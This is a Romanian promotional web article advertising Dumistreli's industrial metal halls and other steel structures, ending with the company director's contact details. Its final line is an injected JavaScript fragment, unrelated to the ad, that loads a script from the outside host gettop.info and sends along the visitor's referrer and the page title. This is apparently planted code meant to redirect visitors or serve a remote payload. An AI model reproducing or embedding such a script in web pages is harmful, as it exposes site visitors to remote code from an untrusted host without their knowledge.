Hale-metalice-industriale-Suceava-WIJ1AConstructiile metalice sunt din ce in ce mai cautate si utilizate, datorita rezistentei de care dau dovada, dar si a modului facil si a perioadei scurte de timp in care sunt asamblate. Este foarte important sa apelezi la o echipa cu o experienta vasta si care sa actioneze cu abilitate si promptitudine in momentul in care ai nevoie de un spatiu industrial.

Compania Dumistreli iti pune la dispozitie spatii industriale pe structura metalica, indiferent de domeniul in care lucrezi: productie, depozitare, prezentare, service auto, logistica sau agro-zootehnice.  Halele metalice Dumistreli sunt realizate din cele mai bune materiale, utilizand utilaje de ultima generatie, pentru a te asigura de durabilitatea si rezistenta lucrarii.

Halele metalice Dumistreli au, in mare, aceeasi structura principala, ce poate fi compusa din stalpi, grinzi, contravantuiri sau portale. In functie de necesitatile si preferintele clientului, stalpii pot fi confectionati din profile laminate, table sudate sau profile zincate. De mai multe tipuri sunt si grinzile; ai de ales intre grinzi zabrelite, grinzi din europrofile sau grinzi din table sudate. Scopul contravantuirilor este de a stabiliza structura, fiind confectionate din profile laminate sau otel rotund filetat. Panelele de acoperis au ca obiectiv principal fixarea invelitorii cladirii, fiind realizate din profile usoare zincate si avand marimi diferite, in conformitate cu caracteristicile fiecarei cladiri in parte.

Invelitoarele unei hale pe structura metalica pot fi si ele de mai multe tipuri, depinzand de scopul cladirii sau de dorintele clientului. Acestea pot fi realizate din table cutata, prin sistemul de inchidere Tabla- Vata- Tabla, prin panouri termoizolante, prin sistemul de inchidere Tabla- Vata- Caseta structurata la exterior sau prin sistemul Tabla- Vata bazaltica- Membrana PVC termosudabila. Fiecare sistem de inchidere este ales pe baza unor criterii ca existent unei izolatii termice, gradul de vizibilitate al interiorului si altele.

Inca din anul 2010, din momentul infiintarii, compania Dumistreli se afla in topul firmelor din domeniul constructiilor metalice. Pe langa halele metalice industriale, Dumistreli va pune la dispozitie o gama larga de structure metalice, poduri, diguri metalice pentru protective, pereti cortina, porti, usi, tamplarie lauminiu si PVC, balcoane pentru cladiri si multe altele. Obiectivul nostru principal este de a le oferi clientilor servicii de cea mai buna calitate, dar so solutii pentru rezolvarea oricaror problem legate de domeniul constructiilor metalice.

Un alt avantaj al halelor metalice industriale, dar si al celorlalte constructii oferite de Dumistreli este reprezentat de preturile extrem de avantajoase. Preturile sunt relativ mici, depinzand de criterii ca: materiale utilizare, timpul de lucru, dificultatea lucrarii etc.

Ai nevoie de un spatiu industrial, rapid, eficient, rezistent si durabil? Apeleaza cu incredere la compania noastra pentru a beneficia de toate avantajele de mai sus, dar si de preturi avantajoase! Alege halele metalice industriale Dumistreli! Pentru a obtine mai multe informatii sau pentru a studia varietatea serviciilor oferite, te invitam sa accesezi platforma web a companiei sau sa ne contactezi utilizand informatiile urmatoare:

Director General

Ing.Constantin Dumistracel
Mob. (+40) 743 149388

Tel.(+40) 330 803841

Fax.(+40) 330 803841

Email. constantin@dumistreli.com

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;